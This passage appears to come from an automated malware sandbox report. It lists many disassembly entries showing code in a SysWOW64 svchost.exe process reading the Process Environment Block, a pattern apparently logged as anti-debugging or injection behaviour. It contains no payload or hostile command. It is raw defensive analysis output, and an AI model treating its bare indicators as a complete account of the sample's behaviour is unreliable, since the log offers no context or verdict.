            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h] 1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h] 1_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] 1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h] 1_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039663FF mov eax, dword ptr fs:[00000030h] 1_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] 1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h] 1_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h] 1_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h] 1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h] 1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] 1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h] 1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h] 1_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] 1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D437C mov eax, dword ptr fs:[00000030h] 1_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h] 1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h] 1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h] 1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] 1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392823B mov eax, dword ptr fs:[00000030h] 1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h] 1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03936259 mov eax, dword ptr fs:[00000030h] 1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h] 1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h] 1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h] 1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h] 1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03934260 mov eax, dword ptr fs:[00000030h] 1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392826B mov eax, dword ptr fs:[00000030h] 1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B019F mov eax, dword ptr fs:[00000030h] 1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h] 1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03970185 mov eax, dword ptr fs:[00000030h] 1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h] 1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h] 1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h] 1_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h] 1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h] 1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h] 1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h] 1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h] 1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h] 1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03960124 mov eax, dword ptr fs:[00000030h] 1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h] 1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h] 1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03936154 mov eax, dword ptr fs:[00000030h] 1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h] 1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h] 1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h] 1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393208A mov eax, dword ptr fs:[00000030h] 1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h] 1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h] 1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h] 1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h] 1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h] 1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h] 1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h] 1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h] 1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h] 1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h] 1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h] 1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h] 1_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03932050 mov eax, dword ptr fs:[00000030h] 1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h] 1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h] 1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D678E mov eax, dword ptr fs:[00000030h] 1_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039307AF mov eax, dword ptr fs:[00000030h] 1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h] 1_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h] 1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039347FB mov eax, dword ptr fs:[00000030h] 1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039527ED mov eax, dword ptr fs:[00000030h] 1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03930710 mov eax, dword ptr fs:[00000030h] 1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03960710 mov eax, dword ptr fs:[00000030h] 1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h] 1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396273C mov eax, dword ptr fs:[00000030h] 1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h] 1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]1_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
